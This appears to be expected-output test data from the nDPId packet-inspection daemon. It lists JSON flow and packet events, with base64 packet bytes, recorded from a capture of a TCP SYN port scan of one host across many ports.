+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsF98AACkGB5SsEAAIQA2GNIzTGAzdU4MZAAAAAGACCAAYgAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsgIEAADEGlvGsEAAIQA2GNIzTxHzdU4MZAAAAAGACCABsDwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsTM8AADIGyaOsEAAIQA2GNIzTF+DdU4MZAAAAAGACDAAUrAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsGXIAACoGBQGsEAAIQA2GNIzTHvHdU4MZAAAAAGACDAANmwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsL2kAADAG6QmsEAAIQA2GNIzTAsrdU4MZAAAAAGACBAAxwgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAszLEAACsGUMGsEAAIQA2GNIzTE4jdU4MZAAAAAGACEAAVBAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs3MEAADkGMrGsEAAIQA2GNIzTIZjdU4MZAAAAAGACCAAO9AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsA1UAADsGCh6sEAAIQA2GNIzTGgzdU4MZAAAAAGACEAAOgAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs5vMAADIGL3+sEAAIQA2GNIzTBEzdU4MZAAAAAGACDAAoQAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsVVQAADoGuR6sEAAIQA2GNIzTFGbdU4MZAAAAAGACDAAYJgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs6cgAAC8GL6qsEAAIQA2GNIzTB7PdU4MZAAAAAGACEAAg2QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsXNgAACcGxJqsEAAIQA2GNIzSBd3dUoMYAAAAAGACEAAisgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsT+AAADQGxJKsEAAIQA2GNIzSCirdUoMYAAAAAGACBAAqZQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAshDcAACsGmTusEAAIQA2GNIzSBIvdUoMYAAAAAGACEAAkBAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsO+EAACwG4JGsEAAIQA2GNIzSBBXdUoMYAAAAAGACBAAwegAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs79wAADMGJZasEAAIQA2GNIzSAGrdUoMYAAAAAGACEAAoJQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsp8sAACsGdaesEAAIQA2GNIzSBCXdUoMYAAAAAGACEAAkagAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsa5sAADsGodesEAAIQA2GNIzSB7TdUoMYAAAAAGACEAAg2wAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs0yUAACsGSk2sEAAIQA2GNIzSDtjdUoMYAAAAAGACEAAZtwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsPsoAACgG4aisEAAIQA2GNIzSBGTdUoMYAAAAAGACBAAwKwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsjmsAACkGkQesEAAIQA2GNIzSaXjdUoMYAAAAAGACCADHFgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsFUoAAC0GBimsEAAIQA2GNIzSFajdUoMYAAAAAGACCAAa5wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAsgfEAADMGk4GsEAAIQA2GNIzSG3HdUoMYAAAAAGACEAANHgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_packet_id":1,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060389,"pkt":"ACYLMQczACWzv5HuCABFAAAs3ikAADgGMkmsEAAIQA2GNIzSDd\/dUoMYAAAAAGACBAAmsAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060389,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 